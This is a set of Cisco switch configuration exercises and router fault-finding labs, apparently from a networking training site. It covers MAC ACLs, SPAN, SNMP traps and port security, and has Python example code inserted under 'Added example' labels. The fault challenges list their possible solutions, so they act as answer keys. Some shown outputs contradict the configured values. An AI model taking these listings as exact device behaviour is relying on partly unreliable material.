Outline
This challenge involves the configuration of a MAC ACL.
Objectives
The objectives of this challenge are to:

Define a MAC ACL.
Define a host to bar from FA0/1.
Apply the MAC ACL on an interface (FA0/1).

Example
> en
# config t
(config)# mac ?
  access-list    Named access-list
  address-table  Configure the MAC address table
(config)# mac acc ?
  extended  Extended Access List
(config)# mac acc ex ?
  WORD  access-list name
(config)# mac acc ex Edinburgh
(config-ext-macl)# ?
Extended MAC Access List configuration commands:
  default  Set a command to its defaults
  deny     Specify packets to reject
  exit     Exit from MAC Named ACL configuration mode
  no       Negate a command or set its defaults
  permit   Specify packets to forward
(config-ext-macl)# deny ?
  H.H.H  48-bit source MAC address
  any    any source MAC address
  host   A single source host
(config-ext-macl)# deny host 1.1.1 ?
  H.H.H  48-bit destination MAC address
  any    any destination MAC address
  host   A single destination host
(config-ext-macl)# deny host 1.1.1 any
(config-ext-macl)# permit any any
(config-ext-macl)# exit
(config)# int fa0/1
(config-if)# mac ?
  access-group  MAC access-group configuration commands
(config-if)# mac access-group ?
  WORD  ACL name
(config-if)# mac access-group Edinburgh ?
  in  Apply to Ingress
(config-if)# mac acc Edinburgh in
(config-if)# exit
(config)# exit
# show access-list
Extended MAC access list Edinburgh
    deny host 1.1.1 any
    permit any any

Cisco Switch Challenge 121


Outline
This challenge involves the configuration of monitors for port spanning.
Objectives
The objectives of this challenge are to:

Define monitors for source and destination.

Example
> en
# config t
(config)# monitor ?
  session  Configure a SPAN session
(config)# monitor session ?
  <1-2>  SPAN session number
(config)# monitor session 1 ?
  destination  SPAN destination interface, VLAN
  source       SPAN source interface, VLAN
(config)# monitor session 1 destination ?
  interface  SPAN destination interface
  remote     SPAN destination Remote
(config)# monitor session 1 source interface ?
  FastEthernet     FastEthernet IEEE 802.3
  GigabitEthernet  GigabitEthernet IEEE 802.3z
(config)# monitor session 1 des interface fa0
  ,     Specify another range of interfaces
  -     Specify a range of interfaces
  both  Monitor received and transmitted traffic
  rx    Monitor received traffic only
  tx    Monitor transmitted traffic only
  <cr>
(config)# monitor session 1 source interface fa0/3
(config)# monitor session 1 destination interface fa0/7
(config)# exit
# sh monitor
Session 1
---------
Source Ports:
    RX Only:       None
    TX Only:       None
    Both:          FA0/3
Destination Ports: FA0/7
# config t
(config)# int vlan 1
(config-if)# ip address 148.183.229.5 255.255.248.0
(config-if)# exit
(config)# ip domain-name perthshire.cc
(config)# ip default-gateway 148.183.229.6

Cisco Switch Challenge 122


Area: Switches MAC address notification traps
Outline
MAC address notification allows the tracking of MAC address activity through SNMP, using
a trap that sends information to an SNMP server when there is activity. The trap interval
defines how often the updates are sent to the SNMP server, which can reduce network
traffic when there is a great deal of MAC address activity.
Objectives
The objectives of this challenge are to:

Define MAC address notification traps.
Define notification details.

The commands used are:


# config t
(config)# snmp-server host 1.2.3.4
(config)# snmp-server enable traps mac-notification
(config)# mac address-table notification
(config)# mac address-table notification interval 60
(config)# mac address-table notification history-size 160
(config)# int fa0/6
(config-if)# int fa0/6
(config-if)# snmp trap mac-notification added

Example

# config t
(config)# snmp-server host 1.2.3.4
(config)# snmp-server ?
  chassis-id        String to uniquely identify this chassis
  community         Enable SNMP; set community string and access privs
  contact           Text for mib object sysContact
  enable            Enable SNMP Traps or Informs
  engineID          Configure a local or remote SNMPv3 engineID
  group             Define a User Security Model group
  host              Specify hosts to receive SNMP notifications
  ifindex           Enable ifindex persistence
  inform            Configure SNMP Informs options
  ip                IP ToS configuration for SNMP traffic
  location          Text for mib object sysLocation
  manager           Modify SNMP manager parameters
  packetsize        Largest SNMP packet size
  queue-length      Message queue length for each TRAP host
  system-shutdown   Enable use of the SNMP reload command
  tftp-server-list  Limit TFTP servers used via SNMP
  trap              SNMP trap options
  trap-source       Assign an interface for the source address of all traps
  trap-timeout      Set timeout for TRAP message retransmissions
  user              Define a user who can access the SNMP engine
  view              Define an SNMPv2 MIB view
(config)# snmp-server enable ?
  informs  Enable SNMP Informs
  traps    Enable SNMP Traps
(config)# snmp-server enable traps ?
  bridge            Enable SNMP STP Bridge MIB traps
  c2900             Enable SNMP c2900 traps
  cluster           Enable Cluster traps
  config            Enable SNMP config traps
  entity            Enable SNMP entity traps
  envmon            Enable SNMP environmental monitor traps
  flash             Enable SNMP FLASH notifications
  hsrp              Enable SNMP HSRP traps
  mac-notification  Enable SNMP MAC Notification traps
  port-security     Enable SNMP port security traps
  rtr               Enable SNMP Response Time Reporter traps
  snmp              Enable SNMP traps
  syslog            Enable SNMP syslog traps
  vlan-membership   Enable SNMP VLAN membership traps
  vlancreate        Enable SNMP VLAN created traps
  vlandelete        Enable SNMP VLAN deleted traps
  vtp               Enable SNMP VTP traps
  <cr>
(config)# snmp-server enable traps mac-notification
(config)# mac ?
  access-list    Named access-list
  address-table  Configure the MAC address table
(config)# mac address-table ?
  aging-time    Set MAC address table entry maximum age
  notification  Enable/Disable MAC Notification on the switch
  static        static keyword
(config)# mac address-table notification ?
  history-size  Number of MAC notifications to be stored
  interval      Interval between the MAC notifications

  <cr>
(config)# mac address-table notification
(config)# mac address-table notification interval 60
(config)# mac address-table notification history-size 160
(config)# int fa0/6
(config-if)# snmp ?
  ifindex  Persist ifindex for the interface
  trap     Allow a specific SNMP trap
(config-if)# snmp trap ?
  link-status       Allow SNMP LINKUP and LINKDOWN traps
  mac-notification  MAC Address notification for the interface
(config-if)# snmp trap mac-notification ?
  added    Enable Mac Address added notification for this port
  removed  Enable Mac Address removed notification for this port
(config-if)# snmp trap mac-notification added
(config-if)# end
# show mac address-table notification
MAC Notification Feature is Disabled on the switch
Interval between Notification Traps : 60 secs
Number of MAC Addresses Added : 0
Number of MAC Addresses Removed : 0
Number of Notifications sent to NMS : 0
Maximum Number of entries configured in History Table : 120
Current History Table Length : 0
MAC Notification Traps are Disabled
History Table contents
----------------------
# sh mac address-table notification interface
MAC Notification Feature is Enabled on the switch
MAC Notification Flags For All Ethernet Interfaces :
----------------------------------------------------
Interface           MAC Added Trap  MAC Removed Trap
------------------  --------------  ----------------
FastEthernet0/1     Disabled        Disabled
FastEthernet0/2     Disabled        Disabled
FastEthernet0/3     Disabled        Disabled
FastEthernet0/4     Disabled        Disabled
FastEthernet0/5     Disabled        Disabled
FastEthernet0/6     Enabled         Disabled
FastEthernet0/7     Disabled        Disabled
FastEthernet0/8     Disabled        Disabled
FastEthernet0/9     Disabled        Disabled
FastEthernet0/10    Disabled        Disabled
FastEthernet0/11    Disabled        Disabled
FastEthernet0/12    Disabled        Disabled
FastEthernet0/13    Disabled        Disabled
FastEthernet0/14    Disabled        Disabled
FastEthernet0/15    Disabled        Disabled
FastEthernet0/16    Disabled        Disabled
FastEthernet0/17    Disabled        Disabled
FastEthernet0/18    Disabled        Disabled
FastEthernet0/19    Disabled        Disabled
FastEthernet0/20    Disabled        Disabled
FastEthernet0/21    Disabled        Disabled
FastEthernet0/22    Disabled        Disabled
FastEthernet0/23    Disabled        Disabled
FastEthernet0/24    Disabled        Disabled
GigabitEthernet0/1  Disabled        Disabled
GigabitEthernet0/2  Disabled        Disabled

Cisco Switch Challenge 123


Area: Switches Secure Addresses
Outline
Secure addresses allow the administrator to pre-define the MAC address of the host that
connects to a given VLAN and interface. If the address of the connecting host does not match,
it will not be able to connect.
Objectives
The objectives of this challenge are to:

Define secure MAC addresses.

The commands used are:


# config t
(config)# int fa0/1
(config-if)# switchport mode access
(config-if)# switchport port-security mac-address 1.2.3
(config-if)# int fa0/2
(config-if)# switchport mode access
(config-if)# switchport port-security mac-address 1.2.4
(config-if)# int fa0/3
(config-if)# switchport mode access
(config-if)# switchport port-security mac-address 1.2.5
(config-if)# end

Example
# config t
(config)# int fa0/1
(config-if)# switchport ?
  access         Set access mode characteristics of the interface
  block          Disable forwarding of unknown uni/multi cast addresses
  broadcast      Set broadcast suppression level on this interface
  encapsulation  Set trunking encapsulation when interface is in trunking mode
  host           Set port host
  mode           Set trunking mode of the interface
  multicast      Set multicast suppression level on this interface
  native         Set trunking native characteristics when interface is in trunking mode
  nonegotiate    Device will not engage in negotiation protocol on this interface
  port-security  Security related command
  priority       Set appliance 802.1p priority
  protected      Configure an interface to be a protected port
  pruning        Set pruning VLAN characteristics when interface is in trunking mode
  trunk          Set trunking characteristics of the interface
  unicast        Set unicast suppression level on this interface
  voice          Voice appliance attributes
  <cr>
(config-if)# switchport port-security ?
  aging        Port-security aging commands
  mac-address  Secure mac address
  maximum      Max secure addrs
  violation    Security Violation Mode
  <cr>
(config-if)# switchport port-security mac-address ?
  H.H.H   48 bit mac address
  sticky  Configure dynamic secure addresses as sticky
(config-if)# switchport port-security mac-address 1.2.3
(config-if)# int fa0/2
(config-if)# switchport port-security mac-address 1.2.4
(config-if)# int fa0/3
(config-if)# switchport port-security mac-address 1.2.5

# show port-security interface fa0/1
Port Security              : Enabled
Port Status                : Secure-down
Violation Mode             : Shutdown
Aging Time                 : 0 mins
Aging Type                 : Absolute
SecureStatic Address Aging : Disabled
Maximum MAC Addresses      : 1
Total MAC Addresses        : 1
Configured MAC Addresses   : 1
Sticky MAC Addresses       : 0
Last Source Address        : 0000.0000.0000
Security Violation Count   : 0

# sh port-security address
          Secure Mac Address Table
-------------------------------------------------------------------
Vlan    Mac Address       Type              Ports   Remaining Age
                                                       (mins)
----    -----------       ----              -----   -------------
   1    0001.0002.0003    SecureConfigured  Fa0/1
-------------------------------------------------------------------
Total Addresses in System (excluding one mac per port)     : 0
Max Addresses limit in System (excluding one mac per port) : 5120

Note
The default for the ports might be:
(config-if)# switchport mode dynamic desirable

and thus must be changed to:
(config-if)# switchport mode access

Otherwise, the port-security command is refused:
(config-if)# switchport port mac 1.2.3
FastEthernet0/x is dynamic port. port-security parameters cannot be set.

Adding another address to an interface that already has one gives:
(config-if)# sw port- mac- 1.2.5
Total secure mac-addresses on interface FastEthernet0/x has reached maximum limit.

The number of secure addresses can be changed with the command:
switchport port-security maximum x
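The port-security behaviour described in this Note, including the two error messages shown, can be worked through with the following Python model. It is an added example, not part of the NetworkSims challenge: the class and function names are this example's own, the default values (maximum 1, violation mode shutdown, mode dynamic desirable) are those the page shows, the learning of extra addresses when maximum is raised is modelled after the sticky/dynamic behaviour the help text mentions, and the MAC addresses are the page's constructed 1.2.3 style values.

```python
# Added example (not from the NetworkSims challenge): a model of the
# port-security behaviour described in the Note above. It reproduces the two
# errors the page shows (a dynamic-mode port refusing port-security parameters,
# and the maximum-limit error), learns extra addresses when 'maximum' leaves
# room, and applies the default 'shutdown' violation mode from the
# 'show port-security interface' output. Names are this example's own; the
# MAC addresses are constructed.
from dataclasses import dataclass, field
from typing import Set


class PortSecurityError(Exception):
    """Raised for the configuration errors the page shows."""


@dataclass
class SecurePort:
    name: str
    mode: str = "dynamic desirable"      # the default the Note warns about
    maximum: int = 1                     # default, as in the show output
    violation: str = "shutdown"          # default violation mode
    configured: Set[str] = field(default_factory=set)   # statically configured
    learned: Set[str] = field(default_factory=set)      # dynamically learned secure
    err_disabled: bool = False
    violation_count: int = 0

    def set_mode(self, mode: str) -> None:
        self.mode = mode

    def secure_count(self) -> int:
        return len(self.configured) + len(self.learned)

    def add_secure_mac(self, mac: str) -> None:
        """'switchport port-security mac-address H.H.H'."""
        if self.mode != "access":
            raise PortSecurityError(
                f"{self.name} is dynamic port. port-security parameters cannot be set.")
        if mac in self.configured:
            return
        if self.secure_count() >= self.maximum:
            raise PortSecurityError(
                f"Total secure mac-addresses on interface {self.name} has reached maximum limit.")
        self.configured.add(mac)

    def set_maximum(self, n: int) -> None:
        """'switchport port-security maximum x'; cannot go below what is configured."""
        if n < len(self.configured):
            raise PortSecurityError("maximum is below the number of configured addresses")
        self.maximum = n

    def receive(self, src_mac: str) -> str:
        """A frame with source src_mac arrives: 'forward' or the action taken."""
        if self.err_disabled:
            return "drop: err-disabled"
        if src_mac in self.configured or src_mac in self.learned:
            return "forward"
        if self.secure_count() < self.maximum:
            self.learned.add(src_mac)      # room left: learn it as a secure address
            return "forward (learned)"
        self.violation_count += 1
        if self.violation == "shutdown":
            self.err_disabled = True
            return "drop: violation, port err-disabled"
        if self.violation == "restrict":
            return "drop: violation counted"
        return "drop"                      # 'protect': silently dropped


def try_add(port: SecurePort, mac: str) -> str:
    """Wrap add_secure_mac so the error text can be inspected without exceptions."""
    try:
        port.add_secure_mac(mac)
        return "ok"
    except PortSecurityError as e:
        return str(e)


if __name__ == "__main__":
    p = SecurePort("FastEthernet0/1")
    print(try_add(p, "0001.0002.0003"))     # refused: port is still dynamic
    p.set_mode("access")
    print(try_add(p, "0001.0002.0003"), try_add(p, "0001.0002.0005"))
    print(p.receive("0001.0002.0003"), p.receive("0000.0000.aaaa"), p.violation_count)
```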

Cisco Switch Challenge 124


Outline
This challenge involves setting up a static MAC address table.
Objectives
The objectives of this challenge are to:

Enable static MAC address table.
Show the MAC address table.

Example
> en
# config t
(config)# mac ?
  access-list    Named access-list
  address-table  Configure the MAC address table
(config)# mac address-table ?
  aging-time    Set MAC address table entry maximum age
  notification  Enable/Disable MAC Notification on the switch
  static        static keyword
(config)# mac address-table aging-time ?
  <0-0>         Enter 0 to disable aging
  <10-1000000>  Aging time in seconds
(config)# mac address-table static ?
  H.H.H  48 bit mac address
(config)# mac address-table static 1.1.1 ?
  vlan  VLAN keyword
(config)# mac address-table static 1.1.1 vlan ?
  <1-4094>  VLAN id of mac address table
(config)# mac address-table static 1.1.1 vlan 1 ?
  drop       drop frames
  interface  interface
(config)# mac address-table static 1.1.1 vlan 1 int ?
  FastEthernet     FastEthernet IEEE 802.3
  GigabitEthernet  GigabitEthernet IEEE 802.3z
  Port-channel     Ethernet Channel of interfaces
(config)# mac address-table static 1.1.1 vlan 1 int fa0/1
(config)# exit
(config)# exit
# sh mac-address-table
          Mac Address Table
-------------------------------------------
Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0012.00b0.2780    STATIC      CPU
 All    0012.00b0.2781    STATIC      CPU
 All    0012.00b0.2782    STATIC      CPU
 All    0012.00b0.2783    STATIC      CPU
 All    0012.00b0.2784    STATIC      CPU
 All    0012.00b0.2785    STATIC      CPU
 All    0012.00b0.2786    STATIC      CPU
 All    0012.00b0.2787    STATIC      CPU
 All    0012.00b0.2788    STATIC      CPU
 All    0012.00b0.2789    STATIC      CPU
 All    0012.00b0.278a    STATIC      CPU
 All    0012.00b0.278b    STATIC      CPU
 All    0012.00b0.278c    STATIC      CPU
 All    0012.00b0.278d    STATIC      CPU
 All    0012.00b0.278e    STATIC      CPU
 All    0012.00b0.278f    STATIC      CPU
 All    0012.00b0.2790    STATIC      CPU
 All    0012.00b0.2791    STATIC      CPU
 All    0012.00b0.2792    STATIC      CPU
 All    0012.00b0.2793    STATIC      CPU
 All    0012.00b0.2794    STATIC      CPU
 All    0012.00b0.2795    STATIC      CPU
 All    0012.00b0.2796    STATIC      CPU
 All    0012.00b0.2797    STATIC      CPU
 All    0012.00b0.2798    STATIC      CPU
 All    0012.00b0.2799    STATIC      CPU
 All    0012.00b0.279a    STATIC      CPU
 All    0100.0c00.0000    STATIC      CPU
 All    0100.0ccc.cccc    STATIC      CPU
 All    0100.0ccc.cccd    STATIC      CPU
 All    0100.0ccd.cdce    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
 All    0180.c200.0001    STATIC      CPU
 All    0180.c200.0002    STATIC      CPU
 All    0180.c200.0003    STATIC      CPU
 All    0180.c200.0004    STATIC      CPU
 All    0180.c200.0005    STATIC      CPU
 All    0180.c200.0006    STATIC      CPU
 All    0180.c200.0007    STATIC      CPU
 All    0180.c200.0008    STATIC      CPU
 All    0180.c200.0009    STATIC      CPU
 All    0180.c200.000a    STATIC      CPU
 All    0180.c200.000b    STATIC      CPU
 All    0180.c200.000c    STATIC      CPU
 All    0180.c200.000d    STATIC      CPU
 All    0180.c200.000e    STATIC      CPU
 All    0180.c200.000f    STATIC      CPU
 All    0180.c200.0010    STATIC      CPU
   1    0001.0001.0001    STATIC      Fa0/1
   1    000d.28fb.ebda    DYNAMIC     Gi0/2
   1    000d.298e.f359    DYNAMIC     Gi0/1
Total Mac Addresses for this criterion: 51

On a switch, the secure address table holds secure MAC addresses and their associated
ports and VLANs. The command binds a secure address to a single port per VLAN, so frames
for that address are forwarded only to that port. Thus:
(config)# mac-address-table static 1.1.1 vlan 1 int fa0/1

will forward any frame destined for MAC address 1.1.1 on VLAN 1 to Fa0/1.
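Added example, not code from the NetworkSims challenge: a parser for the `show mac-address-table` output format shown above, with the two checks an operator would run after adding the static entry (the expected static binding is present; no access port holds more addresses than a `switchport port-security maximum` value would permit) and a completeness check against the switch's own total. The sample output is constructed in the same format, and the regex and function names are this example's own.

```python
"""Parse 'show mac-address-table' output and check it the way an operator
would after adding a static entry. Added example, not NetworkSims code; the
sample below is constructed to mirror the challenge's output format."""
import re
from collections import Counter
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample in the challenge's output format (not a real capture).
# Fa0/3 is given three dynamic addresses so the port-security style check fires.
SAMPLE_OUTPUT = """\
          Mac Address Table
-------------------------------------------

Vlan    Mac Address       Type        Ports
----    -----------       --------    -----
 All    0012.00b0.2780    STATIC      CPU
 All    0180.c200.0000    STATIC      CPU
   1    0001.0001.0001    STATIC      Fa0/1
   1    000d.28fb.ebda    DYNAMIC     Gi0/2
   1    000d.298e.f359    DYNAMIC     Gi0/1
   1    0a1b.2c3d.4e01    DYNAMIC     Fa0/3
   1    0a1b.2c3d.4e02    DYNAMIC     Fa0/3
   1    0a1b.2c3d.4e03    DYNAMIC     Fa0/3
Total Mac Addresses for this criterion: 8
"""

ROW_RE = re.compile(
    r"^\s*(?P<vlan>All|\d+)\s+"
    r"(?P<mac>[0-9a-f]{4}\.[0-9a-f]{4}\.[0-9a-f]{4})\s+"
    r"(?P<kind>STATIC|DYNAMIC)\s+(?P<port>\S+)\s*$",
    re.IGNORECASE,
)
TOTAL_RE = re.compile(r"Total Mac Addresses for this criterion:\s*(\d+)", re.IGNORECASE)


@dataclass(frozen=True)
class MacEntry:
    vlan: str   # "All" for the switch's own CPU entries, otherwise the VLAN id
    mac: str    # dotted hex, lower case, e.g. "0001.0001.0001"
    kind: str   # "STATIC" or "DYNAMIC"
    port: str   # "CPU", "Fa0/1", "Gi0/2", ...


def normalize_mac(mac: str) -> str:
    """Expand the H.H.H shorthand IOS accepts on the command line ('1.1.1')
    to the zero-padded form the table prints ('0001.0001.0001')."""
    parts = mac.lower().split(".")
    if len(parts) != 3 or not all(0 < len(p) <= 4 for p in parts):
        raise ValueError(f"not an H.H.H address: {mac!r}")
    for p in parts:
        int(p, 16)  # raises ValueError on a non-hex group
    return ".".join(p.zfill(4) for p in parts)


def parse_mac_table(text: str) -> Tuple[List[MacEntry], Optional[int]]:
    """Return the table rows and the 'Total ...' count the switch printed
    (None when that trailer line is missing, e.g. on truncated output)."""
    entries: List[MacEntry] = []
    total: Optional[int] = None
    for line in text.splitlines():
        row = ROW_RE.match(line)
        if row:
            entries.append(MacEntry(row["vlan"], row["mac"].lower(),
                                    row["kind"].upper(), row["port"]))
            continue
        trailer = TOTAL_RE.search(line)
        if trailer:
            total = int(trailer.group(1))
    return entries, total


def output_is_complete(entries: List[MacEntry], total: Optional[int]) -> bool:
    """True when the parsed row count matches the switch's own count; a
    mismatch means the capture was cut off or a row failed to parse."""
    return total is not None and total == len(entries)


def has_static_entry(entries: List[MacEntry], mac: str, vlan: int, port: str) -> bool:
    """Check that the binding made with 'mac address-table static <mac> vlan
    <vlan> interface <port>' is present in the table."""
    want = normalize_mac(mac)
    return any(e.kind == "STATIC" and e.mac == want and e.vlan == str(vlan)
               and e.port.lower() == port.lower() for e in entries)


def ports_over_limit(entries: List[MacEntry], maximum: int) -> Dict[str, int]:
    """Addresses per physical port (CPU entries excluded) above 'maximum', the
    figure 'switchport port-security maximum' would enforce on that port."""
    counts = Counter(e.port for e in entries if e.port.upper() != "CPU")
    return {port: n for port, n in counts.items() if n > maximum}


if __name__ == "__main__":
    rows, printed_total = parse_mac_table(SAMPLE_OUTPUT)
    print("complete capture:", output_is_complete(rows, printed_total))
    print("static 1.1.1 on Fa0/1:", has_static_entry(rows, "1.1.1", 1, "fa0/1"))
    print("ports above 2 addresses:", ports_over_limit(rows, 2))
```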

An alternative is:
> en
# config t
(config)# mac-address-table ?
(config)# mac-address-table aging-time ?
(config)# mac-address-table static ?
(config)# mac-address-table static 1.1.1 ?
(config)# mac-address-table static 1.1.1 vlan ?
(config)# mac-address-table static 1.1.1 vlan 1 ?
(config)# mac-address-table static 1.1.1 vlan 1 int ?
(config)# mac-address-table static 1.1.1 vlan 1 int fa0/1

Cisco Switch Challenge 125

Outline
This challenge involves setting up SNMP MAC notification traps.
Objectives
The objectives of this challenge are to:

Enable a MAC SNMP trap.
Define an interval time.
Apply the trap on an interface.

Example
> en
# config t
Switch(config)# snmp-server host 192.168.0.1
Switch(config)# snmp-server enable traps mac-notification
Switch(config)# mac-address-table notification interval ?
<0-2147483647> Notification interval in seconds
Switch(config)# mac-address-table notification interval 60
Switch(config)# mac-address-table notification history-size ?
<0-500> Number of entries in history table
Switch(config)# mac-address-table notification history-size 100
Switch(config)# interface fastethernet0/1
Switch(config-if)# snmp ?
ifindex  Persist ifindex for the interface
trap     Allow a specific SNMP trap
Switch(config-if)# snmp trap ?
link-status       Allow SNMP LINKUP and LINKDOWN traps
mac-notification  MAC Address notification for the interface
Switch(config-if)# snmp trap mac-notification ?
added    Enable Mac Address added notification for this port
removed  Enable Mac Address removed notification for this port
Switch(config-if)# snmp trap mac-notification added

MAC address notification is used to track whenever a machine connects to the network. In
this case, whenever a new MAC address is learned or an existing one is removed, the switch
generates an SNMP trap. If many machines are connecting, the traps can be grouped together
and sent at regular intervals (such as every 60 seconds in the example).

Cisco Switch Test

MLS Optimization and Security
The most up-to-date version of this test is at:
http://networksims.com/s9.html

Cisco Switch Test

Final test
The most up-to-date version of this test is at:
http://networksims.com/

CCNP (Fault finding)

Fault Challenge 1
Fault:

Incorrect IP address on one of the router ports.

Outline
This topology has ONE fault. Try pinging around and performing traceroutes to find it. The
hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
Try to use debugging tools, such as ping and traceroute to find the fault, rather than looking
in each of the configurations. WHEN YOU FIND THE FAULT... FIX IT, and TEST THAT IT
WORKS


Fault Challenge 2
Fault:

Shutdown ports or Incorrect gateway on hosts

Outline
This topology has ONE fault. Try pinging around and performing traceroutes to find it. The
hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
Try to use debugging tools, such as ping and traceroute to find the fault, rather than looking
in each of the configurations. WHEN YOU FIND THE FAULT... FIX IT, and TEST THAT IT
WORKS.

Fault Challenge 3
Fault:

Routing problem: incorrect networks defined for the router.

Outline
This topology has ONE fault. Try pinging around and performing traceroutes to find it. The
hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
Try to use debugging tools, such as ping and traceroute to find the fault, rather than looking
in each of the configurations. WHEN YOU FIND THE FAULT... FIX IT, and TEST THAT IT
WORKS

Fault Challenge 4
Fault:

Incorrectly applied ACL for ICMP on an incoming port

Outline
An ACL which blocks incoming ICMP pings has been added ... find it and remove it. Use
ping and traceroute... The hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
ICMP deny has been applied to one of the incoming ports, find it, and remove it. Use PING
and TRACEROUTE.

Fault Challenge 5
Fault:

Incorrectly applied ACL for ICMP on an outgoing port

Outline
An ACL which blocks outgoing ICMP pings has been added ... find it and remove it. Use
ping and traceroute... The hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
ICMP deny has been applied to one of the outgoing ports, find it, and remove it. Use PING
and TRACEROUTE.

Fault Challenge 6
Fault:

Break in a connection between devices

Outline
There is a break in a connection between the devices. The hosts have been set up as:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
There is a break in a connection between the devices, find it, and remove it. Use PING and
TRACEROUTE. Possible solutions:
Link between Host 1 and R1, E0
Link between Host 2 and R4, E1
Link between Host 3 and R5, E1
Link between R1, S0 and R2, S0
Link between R1, S1 and R3, S0
Link between R2, S1 and R3, S1
Link between R3, E0 and R5, E0
Link between R4, E0 and R2, E0
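Added example, not part of the challenge material: the eight links listed above modelled as a graph, with a hop-count shortest path standing in for what traceroute shows. It demonstrates why ping alone misses a break on a redundant path while traceroute does not, and which single break is consistent with a set of observed traceroutes. The "observed" paths in main() are constructed; equal-cost routing and the interface names are abstracted away.

```python
"""Model the Fault Challenge 6 topology and show what ping and traceroute
reveal when one link is broken. Added example, not NetworkSims code; the
link list is the challenge's own, the observed traceroutes are constructed."""
from collections import deque
from typing import Dict, Iterable, List, Optional, Sequence, Tuple

Link = Tuple[str, str]

# Links exactly as listed in Fault Challenge 6 (interface names in comments).
CHALLENGE_6_LINKS: List[Link] = [
    ("H1", "R1"),  # Host 1 - R1, E0
    ("H2", "R4"),  # Host 2 - R4, E1
    ("H3", "R5"),  # Host 3 - R5, E1
    ("R1", "R2"),  # R1, S0 - R2, S0
    ("R1", "R3"),  # R1, S1 - R3, S0
    ("R2", "R3"),  # R2, S1 - R3, S1
    ("R3", "R5"),  # R3, E0 - R5, E0
    ("R4", "R2"),  # R4, E0 - R2, E0
]


def _adjacency(links: Iterable[Link], broken: Optional[Link]) -> Dict[str, List[str]]:
    """Undirected adjacency list with the broken link (if any) left out."""
    down = frozenset(broken) if broken else frozenset()
    adj: Dict[str, List[str]] = {}
    for a, b in links:
        if frozenset((a, b)) == down:
            continue  # a failed cable carries nothing in either direction
        adj.setdefault(a, []).append(b)
        adj.setdefault(b, []).append(a)
    return adj


def trace_route(links: Iterable[Link], src: str, dst: str,
                broken: Optional[Link] = None) -> Optional[List[str]]:
    """Fewest-hop path from src to dst (BFS), or None when dst is unreachable.
    This is the path a hop-count routing protocol selects, i.e. the sequence
    of devices a traceroute would list."""
    adj = _adjacency(links, broken)
    prev: Dict[str, Optional[str]] = {src: None}
    queue = deque([src])
    while queue:
        node = queue.popleft()
        if node == dst:
            path: List[str] = []
            while node is not None:
                path.append(node)
                node = prev[node]
            return path[::-1]
        for nxt in adj.get(node, []):
            if nxt not in prev:
                prev[nxt] = node
                queue.append(nxt)
    return None


def ping(links: Iterable[Link], src: str, dst: str, broken: Optional[Link] = None) -> bool:
    """Ping only tells you whether some path exists."""
    return trace_route(links, src, dst, broken) is not None


def candidate_breaks(links: Sequence[Link],
                     observations: Sequence[Tuple[str, str, Optional[List[str]]]]) -> List[Link]:
    """Which single broken link explains every (src, dst, observed traceroute)
    triple? This is the reasoning the challenge asks for: compare what the
    traceroutes show with what each possible break would produce."""
    return [link for link in links
            if all(trace_route(links, s, d, broken=link) == seen
                   for s, d, seen in observations)]


if __name__ == "__main__":
    print("healthy H1->H3:", trace_route(CHALLENGE_6_LINKS, "H1", "H3"))
    print("R1-R3 down, H1->H3:", trace_route(CHALLENGE_6_LINKS, "H1", "H3", ("R1", "R3")))
    print("R3-R5 down, ping H1->H3:", ping(CHALLENGE_6_LINKS, "H1", "H3", ("R3", "R5")))
    # Constructed observations: ping succeeds everywhere, but H1->H3 takes
    # an extra hop through R2. Only one break produces exactly these paths.
    observed = [("H1", "H3", ["H1", "R1", "R2", "R3", "R5", "H3"]),
                ("H1", "H2", ["H1", "R1", "R2", "R4", "H2"])]
    print("breaks consistent with observations:", candidate_breaks(CHALLENGE_6_LINKS, observed))
```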

Fault Challenge 7
Fault:

A standard ACL which denies H1, H2 or H3 has been applied.

Outline
This topology has an ACL set which bars either H1, H2 or H3, but no other nodes. The
addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2


Objectives
A standard ACL which denies H1, H2 or H3 has been applied. Use PING and
TRACEROUTE. Possible solutions:
Acl Deny H1 on R1, E0.
Acl Deny H1 on R2, E0.
Acl Deny H1 on R4, S0.
Acl Deny H1 on R5, E0.
Acl Deny H2 on R3, E0.
Acl Deny H1 on R2, S0.
Acl Deny H2 on R4, S0.
Acl Deny H2 on R5, E0.
Acl Deny H3 on R5, E1.
Acl Deny H3 on R4, E0.
Acl Deny H3 on R2, S1.
Acl Deny H3 on R1, E0.
Acl Deny H3 on R3, S1.

Fault Challenge 8
Fault:

An extended ACL which denies a whole subnet

Outline
This topology has an extended ACL set which bars a whole subnet which contains either
H1, H2 or H3. The addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

Objectives
This topology has an extended ACL set which bars a whole subnet which contains either
H1, H2 or H3. Use PING and TRACEROUTE. Possible solutions:

Acl R1, E1, where all hosts on the subnet that H1 is on cannot ping a single host: H2.
Acl R1, E1, where all hosts on the subnet that H1 is on cannot ping a single host: H3.
Acl R3, E0, where all hosts on the subnet that H2 is on cannot ping a single host: H1.
Acl R3, E0, where all hosts on the subnet that H2 is on cannot ping a single host: H3.
Acl R5, E1, where all hosts on the subnet that H3 is on cannot ping a single host: H1.
Acl R5, E1, where all hosts on the subnet that H3 is on cannot ping a single host: H2.

Fault Challenge 9
Fault:

Single IP error

Outline
The devices have been set but there is a fault in one of the IP addresses. As we have a ring
the devices may still give a ping, but the traceroute will give unexpected results. The
addresses of the nodes are:
H1- 192.168.0.2
H2- 192.168.1.2
H3- 192.168.2.2

The interconnected networks are:
10.1.1.0, 10.2.2.0, 10.3.3.0, 10.4.4.0 and 10.5.5.0.

Objectives
The devices have been set but there is a fault in one of the IP addresses. Use PING and
TRACEROUTE. Possible solutions:

R1, E0.
R1, S0.
R1, E1.
R2, E0.
R2, E1.
R3, E0.
R3, E1.
R3, S0.
R4, E0.
R4, E1.
R4, S0.
R5, S0.
